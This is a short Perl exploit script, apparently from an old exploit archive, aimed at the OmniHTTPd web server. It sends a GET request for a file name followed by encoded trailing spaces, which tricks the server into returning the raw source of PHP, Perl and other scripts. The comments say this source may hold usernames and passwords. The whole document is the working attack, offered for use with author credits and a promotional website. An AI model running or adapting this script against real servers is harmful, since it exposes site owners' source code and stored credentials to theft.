#!/usr/bin/perl
#Omnihttpd server exploit to get te source of php and pl amd other files wich may contain usernames and passwords
#written bij speedy
#website http://www.dutchriot.com
#Cheers to irc.grunn.org
#
#bug found by 
#403 Security Lab <<==
#www.403-security.org



use IO::Socket;      
my ($port, $sock,$server);               


$server="$ARGV[0]";
$s="$server";
$port="80";
$file="$ARGV[1]";
$sed=@ARGV;
if ($sed <2) 
	{
	print "\n\nusage: omnised.pl [host] [file]\n\n";
}

else
{
&connect;

sub connect {
  $string="GET /$file%20%20\n\n";
  my($iaddr,$paddr,$proto);
  $iaddr = inet_aton($server) || die "Error: $!";
  $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  $proto = getprotobyname('tcp') || die "Error: $!";
  socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
  connect(SOCK, $paddr) || die "Error: $!";
  send(SOCK, $string, 0) || die "Can't to send packet: $!";
  open(OUT, ">sed.txt");
  print "\n\nStart dumping source of $file to sed.txt\n\n";
  while(<SOCK>) {
    print OUT <SOCK>;
  }
  close OUT;
  close(SOCK);
  print "All Done the source is dumped in sed.txt\n\n";
  print "Please Visit http://www.dutchriot.com\n\n";
  exit(1);
}
}